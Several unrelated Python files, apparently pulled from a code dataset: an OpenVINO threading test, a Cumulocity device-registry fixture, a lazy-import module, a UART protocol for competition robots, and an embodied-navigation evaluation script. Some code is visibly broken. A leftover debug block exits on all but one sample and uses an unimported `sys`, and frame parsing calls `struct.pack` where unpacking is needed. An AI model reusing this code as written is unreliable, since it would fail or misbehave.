net = core.read_network(model=test_net_xml, weights=test_net_bin)
def thread_target(thread_func, thread_args):
call_thread_func.wait()
call_thread_func.clear()
thread_func(*thread_args)
def main_thread_target(gil_release_func, args):
call_thread_func.set()
gil_release_func(*args)
def test_run_parallel(gil_release_func, args, thread_func, thread_args):
thread = Thread(target=thread_target, args=[thread_func, thread_args])
sys.setswitchinterval(1000)
thread.start()
main_thread_target(gil_release_func, args)
thread.join()
sys.setswitchinterval(switch_interval)
main_targets = [{
core.read_network: [test_net_xml, test_net_bin],
core.load_network: [net, device],
},
{
core.load_network: [net, device],
}]
thread_targets = [{
core.get_versions: [device,],
core.read_network: [test_net_xml, test_net_bin],
core.load_network: [net, device],
core.query_network: [net, device],
getattr: [core, "available_devices"],
},
{
getattr: [net, "name"],
getattr: [net, "input_info"],
getattr: [net, "outputs"],
getattr: [net, "batch_size"],
}]
for main_target, custom_target in zip(main_targets, thread_targets):
for nogil_func, args in main_target.items():
for thread_func, thread_args in custom_target.items():
test_run_parallel(nogil_func, args, thread_func, thread_args)
|
test_device_registry.py | # Copyright (c) 2020 Software AG,
# Darmstadt, Germany and/or Software AG USA Inc., Reston, VA, USA,
# and/or its subsidiaries and/or its affiliates and/or their licensors.
# Use, reproduction, transfer, publication or disclosure is prohibited except
# as specifically provided for in your License Agreement with Software AG.
# pylint: disable=redefined-outer-name
import os
import threading
import time
from datetime import datetime
import pytest
from c8y_api import CumulocityApi, CumulocityDeviceRegistry
from c8y_api.model import Device
from tests import RandomNameGenerator
@pytest.fixture(scope='session')
def device_registry(test_environment, logger) -> CumulocityDeviceRegistry:
"""Provide a device registry instance."""
# the live_c8y instance already read/updated the environment
try:
base_url = os.environ['C8Y_BASEURL']
bootstrap_tenantr = os.environ['C8Y_DEVICEBOOTSTRAP_TENANT']
bootstrap_user = os.environ['C8Y_DEVICEBOOTSTRAP_USER']
bootstrap_password = os.environ['C8Y_DEVICEBOOTSTRAP_PASSWORD']
except KeyError as e:
raise RuntimeError(f"Missing Cumulocity environment variable: {e} "
"Please define the required variables directly or setup a .env file.") from e
return CumulocityDeviceRegistry(base_url, bootstrap_tenantr, bootstrap_user, bootstrap_password)
@pytest.fixture(scope='function')
def sample_device(live_c8y: CumulocityApi, device_registry: CumulocityDeviceRegistry, logger) -> Device:
"""Provide a sample device, created via the device registry process."""
device_id = RandomNameGenerator.random_name(3)
# 1) create a device connection request
live_c8y.device_inventory.request(device_id)
# 2) continously try to accept the request
# the request can be accepted once there was some communication
# we will do this asynchronously
def await_communication_and_accept():
# pylint: disable=bare-except
for _ in range(1, 100):
try:
live_c8y.device_inventory.accept(device_id)
break
except:
logger.info("Unable to accept device request. Waiting for device communication.")
time.sleep(0.5)
threading.Thread(target=await_communication_and_accept).start()
# 3) Wait for the request acceptance
logger.info(f"Requesting credentials for device '{device_id}'.")
device_api = device_registry.await_connection(device_id)
logger.info("Credentials request accepted.")
# 4) Create a digital twin
device = Device(c8y=device_api, name=device_id, type='c8y_TestDevice').create()
logger.info(f"Device created: '{device_id}', ID: {device.id}, Owner:{device.owner}")
yield device
logger.info("Deleting the device (and user) ...")
device.delete()
logger.info(f"Device '{device_id}' deleted.")
live_c8y.users.delete(device.owner)
logger.info(f"User '{device.owner}' deleted.")
def test_device_created(sample_device: Device):
"""Verify that the sample device was created properly."""
# -> should have a database ID
assert sample_device.id
# -> should have been created less that 10s before
now = time.time()
creation_time = datetime.timestamp(sample_device.creation_datetime)
assert creation_time - now < 10
# -> should have a proper device user as owner
assert sample_device.owner == sample_device.c8y.username
assert sample_device.owner == sample_device.get_username()
|
__init__.py | import threading
def htrain(*args, **kwargs):
from varvar.htrees import multiplicative_variance_trees as _htrain
return _htrain(*args, **kwargs)
def qtrain(*args, **kwargs):
from varvar.qtrees import multiplicative_variance_trees as _qtrain
return _qtrain(*args, **kwargs)
def predict(*args, **kwargs):
from varvar.predict import predict as _predict
return _predict(*args, **kwargs)
def import_():
import varvar.qtrees
import varvar.htrees
import varvar.predict
_thread = threading.Thread(target=import_)
_thread.start()
|
connection.py | '''
Author: Ligcox
Date: 2021-04-06 15:20:21
LastEditors: Ligcox
LastEditTime: 2021-08-20 16:38:44
Description: The principal implementation of Birdiebot Communication Protocol
Apache License (http://www.apache.org/licenses/)
Shanghai University Of Engineering Science
Copyright (c) 2021 Birdiebot R&D department
'''
from config import *
from utils import *
from config.devConfig import *
from config.connConfig import *
class Connection(object):
def __init__(self, p=PORTX, b=BPS, to=TIMEX):
'''
description: USART设备类,相关配置请在/src/config/devConfig.py配置
param {*p: com口设备号, b: 波特率, to: 超时时间}
return {*}
'''
self.device = serial.Serial(port=p, baudrate=b, timeout=to)
self.stop_flag = False
self.status = STATUS
self.tx_queue = []
self.tx_thread = threading.Thread(target=self.tx_function, name="tx_thread")
self.reset_rx_buffer()
self.rx_queue = Queue()
self.rx_thread = threading.Thread(target=self.receive, name="rx_thread")
self.current_packet = copy.deepcopy(D_INFO)
self.start()
def start(self):
'''
description: 线程开始方法
param {*}
return {*}
'''
self.stop_flag = False
self.rx_thread.start()
self.tx_thread.start()
def stop(self):
'''
description: 线程结束方法
param {*}
return {*}
'''
self.stop_flag = True
self.rx_thread.join()
def reset_rx_buffer(self):
'''
description: 重置接收buffer
param {*}
return {*}
'''
self.current_packet = copy.deepcopy(D_INFO)
self.rx_status = 0
self.rx_datalen = 0
def rx_function(self):
'''
description: UART接收及处理
param {*}
return {*}
'''
rx_bytes = self.device.readall()
for rx_byte in rx_bytes:
if self.rx_status == 0: # 等待HEAD
if rx_byte == D_INFO["HEAD"]:
self.rx_status = 1
elif self.rx_status == 1: # 等待D_ADDR
if rx_byte == D_ADDR["mainfold"]:
self.current_packet["D_ADDR"] = rx_byte
self.rx_status = 2
else:
self.reset_rx_buffer()
elif self.rx_status == 2: # 等待ID
self.current_packet["ID"] = rx_byte
self.rx_status = 3
elif self.rx_status == 3: # 等待LEN
# 貌似python3直接转换byte->int
self.current_packet["LEN"] = rx_byte
if rx_byte == 0:
self.rx_status = 5
else:
self.rx_status = 4
elif self.rx_status == 4: # 等待DATA
self.current_packet["DATA"].append(rx_byte)
self.rx_datalen += 1
if self.rx_datalen >= self.current_packet["LEN"]:
self.rx_status = 5
elif self.rx_status == 5: # 等待SUM_CHECK
self.current_packet["SUM_CHECK"], self.current_packet["ADD_CHECK"] = sumcheck_cal(self.current_packet)
if rx_byte == self.current_packet["SUM_CHECK"]:
self.rx_status = 6
else: # 校验失败
self.reset_rx_buffer()
elif self.rx_status == 6: # 等待ADD_CHECK
if rx_byte == self.current_packet["ADD_CHECK"]:
self.rx_queue.put(copy.deepcopy(self.current_packet))
self.bcpAnalysis()
self.reset_rx_buffer() # 校验失败或者成功后都需要重设
@loger.AngleLoger
def gimbalAnalysis(self, bcpframe):
'''
description: 云台BCP数据解析
param {*}
return {*}
'''
self.status["yaw_angle"] = struct.pack("h", bcpframe["DATA"][0], bcpframe["DATA"][1]) /1000
self.status["pitch_angle"] = struct.pack("h", bcpframe["DATA"][2], bcpframe["DATA"][3]) /1000
return self.status["yaw_angle"], self.status["pitch_angle"]
def bcpAnalysis(self):
'''
description: BCP数据解析
param {*}
return {*}
'''
bcpframe = self.rx_queue.get(False)
if bcpframe["ID"] == ID["manifold_ctrl"]:
self.status["mode"] = bcpframe["DATA"][0]
elif bcpframe["ID"] == ID["barrel"]:
_val = bcpframe["DATA"][0]
self.status["isShoot"] = _val
elif bcpframe["ID"] == ID["chassis"]:
_val = bcpframe["DATA"][0]
self.status["pathway_direction"] = _val
elif bcpframe["ID"] == ID["chassis_speed"]:
_val = struct.pack("i", bcpframe["DATA"][0], bcpframe["DATA"][1], bcpframe["DATA"][2],bcpframe["DATA"][3])
self.status["pathway_speed"] = _val
elif bcpframe["ID"] == ID["gimbal_angle"]:
self.gimbalAnalysis(bcpframe)
def tx_function(self):
'''
description: USART发送方法
param {*}
return {*}
'''
while not self.stop_flag:
while len(self.tx_queue) != 0:
tx_packet = self.tx_queue.pop()
self.device.write(tx_packet)
time.sleep(getThreadingSleepTime("tx_threading"))
def send(self, tx_packet):
'''
description: 将数据放入发送buffer
param {*tx_packet: 发送的数据}
return {*}
'''
self.tx_queue.append(copy.deepcopy(tx_packet))
def receive(self):
'''
description: UAST接收方法
param {*}
return {*}
'''
while not self.stop_flag:
self.rx_function()
time.sleep(getThreadingSleepTime("rx_threading"))
class SerialInfo(object):
def __init__(self):
'''
description: UART信息
param {*} self
return {*}
'''
self.INFO = copy.deepcopy(D_INFO)
def getInfo(self):
'''
description: 获取BCP数据帧的bytes数据
param {*}
return {*}
'''
return bytearray([
self.INFO["HEAD"],
self.INFO["D_ADDR"],
self.INFO["ID"],
self.INFO["LEN"],
*self.INFO["DATA"],
self.INFO["SUM_CHECK"],
self.INFO["ADD_CHECK"]
])
class Robot(SerialInfo):
def __init__(self, conn: Connection, name=None, data=None):
'''
description: 机器人通讯对象,其他机器人应该由该类派生
param {*}
return {*}
'''
super().__init__()
self.name = name
self.initRobot()
self.conn = conn
if data is not None:
self.setDATA(*data)
# 心跳帧变量设置
self.beat_info = 0
self.last_time = 0
self.status = conn.status
def __call__(self, idx, identif, data):
'''
description: 临时发送到其他机器人数据方法
param {*}
return {*}
'''
self.setID(idx)
self.setDATA(identif, data)
return self.getInfo()
def setID(self, idx):
'''
description: 设置机器人id
param {*idx:BCP定义的机器人id}
return {*}
'''
self.INFO["ID"] = ID[idx]
def setDATA(self, identif, data):
'''
description: 设置机器人数据
param {*}
return {*}
'''
identif = "<" + identif
if isinstance(data, int):
self.INFO["DATA"] = struct.pack(identif, data)
self.INFO["LEN"] = 1
else:
self.INFO["DATA"] = struct.pack(identif, *data)
self.INFO["LEN"] = len(self.INFO["DATA"])
self.INFO["SUM_CHECK"], self.INFO["ADD_CHECK"] = sumcheck_cal(self.INFO)
def initRobot(self):
'''
description: 初始化机器人目标地址
param {*}
return {*}
'''
self.INFO["D_ADDR"] = D_ADDR[self.name]
@loger.ModeLoger
def mode_ctrl(self, stu):
'''
@brief: 模式控制
发送任意值,使得哨兵模式更改
# TODO
'''
self.setID("mode")
self.setDATA("B", stu)
self.conn.send(self.getInfo())
return stu
def launch(self):
self.setDATA("", self.INFO)
@loger.GimbalLoger
def gimbal(self, yaw_angle, pitch_angle):
'''
@brief: 控制云台偏转
'''
self.setID("gimbal")
self.setDATA("hh", (int(yaw_angle*1000), int(pitch_angle*1000)))
self.conn.send(self.getInfo())
return yaw_angle, pitch_angle
@loger.BarrelLoger
def barrel(self, speed, stu):
'''
@brief: 枪管发射
stu: 0为发射,1为不发射
'''
self.setID("barrel")
self.setDATA("BB", (speed, stu))
self.conn.send(self.getInfo())
return stu
def heartbeat(self):
'''
:brief: 心跳数据,每隔50ms
'''
if time.time() - self.last_time >= 0.05:
self.setID("heartbeat")
self.beat_info = 0 if self.beat_info == 1 else 1
self.setDATA("B", self.beat_info)
self.conn.send(self.getInfo())
self.last_time = time.time()
@loger.PathwayLoger
def pathway(self, stu):
'''
@brief: 控制轨道:0xAA不处理轨道信息 0x00(弹丸在正中央) 0x01(弹丸在右侧) -0x01(弹丸在左侧)
'''
self.setID("chassis")
self.setDATA("b", stu)
self.conn.send(self.getInfo())
return stu
# @loger.PathwayLoger
def devError(self, stu):
'''
@brief: 设备故障函数
@param: stu:故障线程id
'''
self.setID("deverror")
self.setDATA("b", stu)
self.conn.send(self.getInfo())
return stu
class Sentry_up(Robot):
def __init__(self, conn, name = "sentry_up"):
super().__init__(conn, name)
class Hero(Robot):
def __init__(self, conn, name="hero"):
super().__init__(conn, name)
class Sentry_down(Robot):
def __init__(self, conn, name = "sentry_down"):
super().__init__(conn, name)
class Infantry(Robot):
def __init__(self, conn, name = "infantry"):
super().__init__(conn, name)
class Engineer(Robot):
def __init__(self, conn, name = "engineer"):
super().__init__(conn, name) |
train_nav.py | import time
import argparse
from datetime import datetime
import logging
import numpy as np
import os
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from models import NavCnnModel, NavCnnRnnModel, NavCnnRnnMultModel, NavPlannerControllerModel
from data import EqaDataLoader
from metrics import NavMetric
from models import MaskedNLLCriterion
from models import get_state, ensure_shared_grads
from data import load_vocab
from torch.autograd import Variable
from tqdm import tqdm
import time
import cv2
import csv
import pickle as pkl
from collections import defaultdict
torch.backends.cudnn.enabled = False
################################################################################################
#make models trained in pytorch 4 compatible with earlier pytorch versions
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
################################################################################################
def oneHot(vec, dim):
batch_size = vec.size(0)
out = torch.zeros(batch_size, dim)
out[np.arange(batch_size), vec.long()] = 1
return out
def load_semantic_classes(color_file):
if color_file is None:
raise ValueError('please input colormap_fine.csv file')
semantic_classes = {}
with open(color_file) as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
# OpenCV is in BGR Format
c = np.array((row['r'], row['g'], row['b']), dtype=np.uint8)
fine_cat = row['name'].lower()
semantic_classes[fine_cat] = c
return semantic_classes
def coverage(img, target_obj_class, semantic_classes):
hei, wid, _ = img.shape
trgt_obj_col = semantic_classes[target_obj_class]
mask = np.all(img == trgt_obj_col, axis=2)
cov = np.sum(mask)/(hei * wid)
return cov
def avgCov(cov_dict):
""" calculate avg coverage for the last 5 frames for all batches"""
total = 0
count_ = 0
for t in list(cov_dict.keys()):
for num in list(cov_dict[t].keys()):
for i in list(cov_dict[t][num].keys()):
cov_epi = cov_dict[t][num][i][-6:-1]
total += np.sum(np.array(cov_epi))
count_ += 1
return total/count_
def eval(rank, args, shared_model, best_eval_acc):
#torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
if args.model_type == 'cnn':
model_kwargs = {}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'cnn+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'lstm':
model_kwargs = {}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'lstm+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'lstm-mult+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnMultModel(**model_kwargs)
elif args.model_type == 'pacman':
model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
model = NavPlannerControllerModel(**model_kwargs)
else:
exit()
eval_loader_kwargs = {
'questions_h5': getattr(args, args.eval_split + '_h5'),
'data_json': args.data_json,
'vocab': args.vocab_json,
'target_obj_conn_map_dir': args.target_obj_conn_map_dir,
'map_resolution': args.map_resolution,
'batch_size': 1,
'input_type': args.model_type,
'num_frames': 5,
'split': args.eval_split,
'max_threads_per_gpu': args.max_threads_per_gpu,
'gpu_id': 0,
'to_cache': False,
'overfit': args.overfit,
'max_controller_actions': args.max_controller_actions,
}
eval_loader = EqaDataLoader(**eval_loader_kwargs)
print('eval_loader has %d samples' % len(eval_loader.dataset))
logging.info("EVAL: eval_loader has {} samples".format(len(eval_loader.dataset)))
#Saty:
semantic_classes = load_semantic_classes(eval_loader.dataset.cfg['colorFile'])
coverage_log = defaultdict(dict)
args.output_log_path = os.path.join(args.log_dir,
'eval_' + str(rank) + '.json')
t, epoch, best_eval_acc = 0, 0, 0.0
max_epochs = args.max_epochs
if args.mode == 'eval':
max_epochs = 1
while epoch < 1:
invalids = []
model.load_state_dict(shared_model.state_dict())
model.eval()
# that's a lot of numbers
metrics = NavMetric(
info={'split': args.eval_split,
'thread': rank},
metric_names=[
'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
'ep_len_30', 'ep_len_50'
],
log_json=args.output_log_path)
if 'cnn' in args.model_type:
done = False
while done == False:
for batch in tqdm(eval_loader):
model.load_state_dict(shared_model.state_dict())
model.to(device)
idx, questions, _, img_feats, actions_in, actions_out, action_length = batch
##########
#Sai analysis
# pdb.set_trace()
if 364909 in idx:
#pass
question = torch.tensor([[105, 25, 53, 94, 72, 50, 94, 11, 2, 0]])
else:
sys.exit(1)
##########
metrics_slug = {}
# evaluate at multiple initializations
for i in [10, 30, 50]:
t += 1
if action_length[0] + 1 - i - 5 < 0:
invalids.append(idx[0])
continue
ep_inds = [
x for x in range(action_length[0] + 1 - i - 5,
action_length[0] + 1 - i)
]
sub_img_feats = torch.index_select(
img_feats, 1, torch.LongTensor(ep_inds))
init_pos = eval_loader.dataset.episode_pos_queue[
ep_inds[-1]]
h3d = eval_loader.dataset.episode_house
h3d.env.reset(
x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
init_dist_to_target = h3d.get_dist_to_target(
h3d.env.cam.pos)
if init_dist_to_target < 0: # unreachable
invalids.append(idx[0])
continue
sub_img_feats_var = Variable(sub_img_feats.to(device))
if '+q' in args.model_type:
questions_var = Variable(questions.to(device))
# sample actions till max steps or <stop>
# max no. of actions = 100
episode_length = 0
episode_done = True
dists_to_target, pos_queue, actions = [
init_dist_to_target
], [init_pos], []
for step in range(args.max_episode_length):
episode_length += 1
if '+q' in args.model_type:
scores = model(sub_img_feats_var,
questions_var)
else:
scores = model(sub_img_feats_var)
prob = F.softmax(scores, dim=1)
action = int(prob.max(1)[1].data.cpu().numpy()[0])
actions.append(action)
img, _, episode_done = h3d.step(action)
episode_done = episode_done or episode_length >= args.max_episode_length
img = torch.from_numpy(img.transpose(
2, 0, 1)).float() / 255.0
img_feat_var = eval_loader.dataset.cnn(
Variable(img.view(1, 3, 224, 224)
.to(device))).view(1, 1, 3200)
sub_img_feats_var = torch.cat(
[sub_img_feats_var, img_feat_var], dim=1)
sub_img_feats_var = sub_img_feats_var[:, -5:, :]
dists_to_target.append(
h3d.get_dist_to_target(h3d.env.cam.pos))
pos_queue.append([
h3d.env.cam.pos.x, h3d.env.cam.pos.y,
h3d.env.cam.pos.z, h3d.env.cam.yaw
])
if episode_done == True:
break
# compute stats
metrics_slug['d_0_' + str(i)] = dists_to_target[0]
metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
metrics_slug['d_D_' + str(
i)] = dists_to_target[0] - dists_to_target[-1]
metrics_slug['d_min_' + str(i)] = np.array(
dists_to_target).min()
metrics_slug['ep_len_' + str(i)] = episode_length
if action == 3:
metrics_slug['stop_' + str(i)] = 1
else:
metrics_slug['stop_' + str(i)] = 0
inside_room = []
for p in pos_queue:
inside_room.append(
h3d.is_inside_room(
p, eval_loader.dataset.target_room))
if inside_room[-1] == True:
metrics_slug['r_T_' + str(i)] = 1
else:
metrics_slug['r_T_' + str(i)] = 0
if any([x == True for x in inside_room]) == True:
metrics_slug['r_e_' + str(i)] = 1
else:
metrics_slug['r_e_' + str(i)] = 0
# collate and update metrics
metrics_list = []
for i in metrics.metric_names:
if i not in metrics_slug:
metrics_list.append(metrics.metrics[
metrics.metric_names.index(i)][0])
else:
metrics_list.append(metrics_slug[i])
# update metrics
metrics.update(metrics_list)
print(metrics.get_stat_string(mode=0))
print('invalids', len(invalids))
logging.info("EVAL: metrics: {}".format(metrics.get_stat_string(mode=0)))
logging.info("EVAL: invalids: {}".format(len(invalids)))
# del h3d
eval_loader.dataset._load_envs()
if len(eval_loader.dataset.pruned_env_set) == 0:
done = True
elif 'lstm' in args.model_type:
done = False
while done == False:
if args.overfit:
metrics = NavMetric(
info={'split': args.eval_split,
'thread': rank},
metric_names=[
'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
'ep_len_30', 'ep_len_50'
],
log_json=args.output_log_path)
for batch in tqdm(eval_loader):
model.load_state_dict(shared_model.state_dict())
model.to(device)
idx, questions, answer, _, actions_in, actions_out, action_lengths, _ = batch
question_var = Variable(questions.to(device))
metrics_slug = {}
# evaluate at multiple initializations
for i in [10, 30, 50]:
t += 1
if action_lengths[0] - 1 - i < 0:
invalids.append([idx[0], i])
continue
h3d = eval_loader.dataset.episode_house
# forward through lstm till spawn
if len(eval_loader.dataset.episode_pos_queue[:-i]
) > 0:
images = eval_loader.dataset.get_frames(
h3d,
eval_loader.dataset.episode_pos_queue[:-i],
preprocess=True)
raw_img_feats = eval_loader.dataset.cnn(
Variable(torch.FloatTensor(images).to(device)))
actions_in_pruned = actions_in[:, :
action_lengths[0] -
i]
actions_in_var = Variable(actions_in_pruned.to(device))
action_lengths_pruned = action_lengths.clone(
).fill_(action_lengths[0] - i)
img_feats_var = raw_img_feats.view(1, -1, 3200)
if '+q' in args.model_type:
scores, hidden = model(
img_feats_var, question_var,
actions_in_var,
action_lengths_pruned.cpu().numpy())
else:
scores, hidden = model(
img_feats_var, False, actions_in_var,
action_lengths_pruned.cpu().numpy())
try:
init_pos = eval_loader.dataset.episode_pos_queue[
-i]
except:
invalids.append([idx[0], i])
continue
action_in = torch.LongTensor(1, 1).fill_(
actions_in[0,
action_lengths[0] - i]).to(device)
else:
init_pos = eval_loader.dataset.episode_pos_queue[
-i]
hidden = model.nav_rnn.init_hidden(1)
action_in = torch.LongTensor(1, 1).fill_(0).to(device)
h3d.env.reset(
x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
init_dist_to_target = h3d.get_dist_to_target(
h3d.env.cam.pos)
if init_dist_to_target < 0: # unreachable
invalids.append([idx[0], i])
continue
img = h3d.env.render()
img = torch.from_numpy(img.transpose(
2, 0, 1)).float() / 255.0
img_feat_var = eval_loader.dataset.cnn(
Variable(img.view(1, 3, 224, 224).to(device))).view(
1, 1, 3200)
episode_length = 0
episode_done = True
dists_to_target, pos_queue, actions = [
init_dist_to_target
], [init_pos], []
actual_pos_queue = [(h3d.env.cam.pos.x, h3d.env.cam.pos.z, h3d.env.cam.yaw)]
for step in range(args.max_episode_length):
episode_length += 1
if '+q' in args.model_type:
scores, hidden = model(
img_feat_var,
question_var,
Variable(action_in),
False,
hidden=hidden,
step=True)
else:
scores, hidden = model(
img_feat_var,
False,
Variable(action_in),
False,
hidden=hidden,
step=True)
prob = F.softmax(scores, dim=1)
action = int(prob.max(1)[1].data.cpu().numpy()[0])
actions.append(action)
img, _, episode_done = h3d.step(action)
episode_done = episode_done or episode_length >= args.max_episode_length
img = torch.from_numpy(img.transpose(
2, 0, 1)).float() / 255.0
img_feat_var = eval_loader.dataset.cnn(
Variable(img.view(1, 3, 224, 224)
.to(device))).view(1, 1, 3200)
action_in = torch.LongTensor(
1, 1).fill_(action + 1).to(device)
dists_to_target.append(
h3d.get_dist_to_target(h3d.env.cam.pos))
pos_queue.append([
h3d.env.cam.pos.x, h3d.env.cam.pos.y,
h3d.env.cam.pos.z, h3d.env.cam.yaw
])
if episode_done == True:
break
actual_pos_queue.append([
h3d.env.cam.pos.x, h3d.env.cam.pos.z, h3d.env.cam.yaw])
# compute stats
metrics_slug['d_0_' + str(i)] = dists_to_target[0]
metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
metrics_slug['d_D_' + str(
i)] = dists_to_target[0] - dists_to_target[-1]
metrics_slug['d_min_' + str(i)] = np.array(
dists_to_target).min()
metrics_slug['ep_len_' + str(i)] = episode_length
if action == 3:
metrics_slug['stop_' + str(i)] = 1
else:
metrics_slug['stop_' + str(i)] = 0
inside_room = []
for p in pos_queue:
inside_room.append(
h3d.is_inside_room(
p, eval_loader.dataset.target_room))
if inside_room[-1] == True:
metrics_slug['r_T_' + str(i)] = 1
else:
metrics_slug['r_T_' + str(i)] = 0
if any([x == True for x in inside_room]) == True:
metrics_slug['r_e_' + str(i)] = 1
else:
metrics_slug['r_e_' + str(i)] = 0
# collate and update metrics
metrics_list = []
for i in metrics.metric_names:
if i not in metrics_slug:
metrics_list.append(metrics.metrics[
metrics.metric_names.index(i)][0])
else:
metrics_list.append(metrics_slug[i])
# update metrics
metrics.update(metrics_list)
print(metrics.get_stat_string(mode=0))
print('invalids', len(invalids))
logging.info("EVAL: init_steps: {} metrics: {}".format(i, metrics.get_stat_string(mode=0)))
logging.info("EVAL: init_steps: {} invalids: {}".format(i, len(invalids)))
# del h3d
eval_loader.dataset._load_envs()
print("eval_loader pruned_env_set len: {}".format(len(eval_loader.dataset.pruned_env_set)))
logging.info("eval_loader pruned_env_set len: {}".format(len(eval_loader.dataset.pruned_env_set)))
assert len(eval_loader.dataset.pruned_env_set) > 0
if len(eval_loader.dataset.pruned_env_set) == 0:
done = True
elif 'pacman' in args.model_type:
done = False
while done == False:
if args.overfit:
metrics = NavMetric(
info={'split': args.eval_split,
'thread': rank},
metric_names=[
'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
'ep_len_30', 'ep_len_50'
],
log_json=args.output_log_path)
#time_img = time.strftime("%m_%d_%H:%M")
for num, batch in enumerate(tqdm(eval_loader)):
model.load_state_dict(shared_model.state_dict())
model.to(device)
idx, question, answer, actions, action_length = batch
metrics_slug = {}
#print('Question is ', question)
#print('answer is ', answer)
answeris = answer.item()
h3d = eval_loader.dataset.episode_house
# print("Target Room Is: ")
# print(eval_loader.dataset.target_room)
# print("Target Object Is: ")
# print(eval_loader.dataset.target_obj)
# evaluate at multiple initializations
video_dir = '../video/nav'
video_dir = os.path.join(video_dir,
args.time_id + '_' + args.identifier)
for i in [10, 30, 50]:
#Satyen suggests Himi changes ----> works
fourcc = cv2.VideoWriter_fourcc(*'XVID')
time_now = time.strftime("%m_%d_%H:%M")
if args.render:
video_name = '%s_video_%d_%d.avi' %(time_now, i, answeris)
video = cv2.VideoWriter(video_name, fourcc, 5, (224, 224))
t += 1
if i > action_length[0]:
invalids.append([idx[0], i])
continue
question_var = Variable(question.to(device))
controller_step = False
planner_hidden = model.planner_nav_rnn.init_hidden(1)
# get hierarchical action history
(
planner_actions_in, planner_img_feats,
controller_step, controller_action_in,
controller_img_feats, init_pos,
controller_action_counter
) = eval_loader.dataset.get_hierarchical_features_till_spawn(
actions[0, :action_length[0] + 1].numpy(), i, args.max_controller_actions
)
planner_actions_in_var = Variable(
planner_actions_in.to(device))
planner_img_feats_var = Variable(
planner_img_feats.to(device))
# forward planner till spawn to update hidden state
for step in range(planner_actions_in.size(0)):
planner_scores, planner_hidden = model.planner_step(
question_var, planner_img_feats_var[step]
.unsqueeze(0).unsqueeze(0),
planner_actions_in_var[step].view(1, 1),
planner_hidden
)
h3d.env.reset(
x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
init_dist_to_target = h3d.get_dist_to_target(
h3d.env.cam.pos)
if init_dist_to_target < 0: # unreachable
invalids.append([idx[0], i])
continue
dists_to_target, pos_queue, pred_actions = [
init_dist_to_target
], [init_pos], []
planner_actions, controller_actions = [], []
episode_length = 0
if args.max_controller_actions > 1:
controller_action_counter = controller_action_counter % args.max_controller_actions
controller_action_counter = max(controller_action_counter - 1, 0)
else:
controller_action_counter = 0
first_step = True
first_step_is_controller = controller_step
planner_step = True
action = int(controller_action_in)
cov_batch_i = []
for step in range(args.max_episode_length):
if not first_step:
img = torch.from_numpy(img.transpose(
2, 0, 1)).float() / 255.0
img_feat_var = eval_loader.dataset.cnn(
Variable(img.view(1, 3, 224,
224).to(device))).view(
1, 1, 3200)
else:
img_feat_var = Variable(controller_img_feats.to(device)).view(1, 1, 3200)
if not first_step or first_step_is_controller:
# query controller to continue or not
controller_action_in = Variable(
torch.LongTensor(1, 1).fill_(action).to(device))
controller_scores = model.controller_step(
img_feat_var, controller_action_in,
planner_hidden[0])
prob = F.softmax(controller_scores, dim=1)
controller_action = int(
prob.max(1)[1].data.cpu().numpy()[0])
if controller_action == 1 and controller_action_counter < args.max_controller_actions - 1:
controller_action_counter += 1
planner_step = False
else:
controller_action_counter = 0
planner_step = True
controller_action = 0
controller_actions.append(controller_action)
first_step = False
if planner_step:
if not first_step:
action_in = torch.LongTensor(
1, 1).fill_(action + 1).to(device)
planner_scores, planner_hidden = model.planner_step(
question_var, img_feat_var,
Variable(action_in), planner_hidden)
prob = F.softmax(planner_scores, dim=1)
action = int(
prob.max(1)[1].data.cpu().numpy()[0])
planner_actions.append(action)
episode_done = action == 3 or episode_length >= args.max_episode_length
episode_length += 1
dists_to_target.append(
h3d.get_dist_to_target(h3d.env.cam.pos))
pos_queue.append([
h3d.env.cam.pos.x, h3d.env.cam.pos.y,
h3d.env.cam.pos.z, h3d.env.cam.yaw
])
# Saty: semantic maps here
target_obj = eval_loader.dataset.target_obj['fine_class']
img_semantic = h3d.env.render(mode='semantic')
cov = coverage(img_semantic, target_obj, semantic_classes)
cov_batch_i.append(cov)
if episode_done:
cov_batch_i.append(target_obj)
if num not in coverage_log[t].keys():
coverage_log[t][num] = {}
coverage_log[t][num].update({i:cov_batch_i})
break
img, _, _ = h3d.step(action)
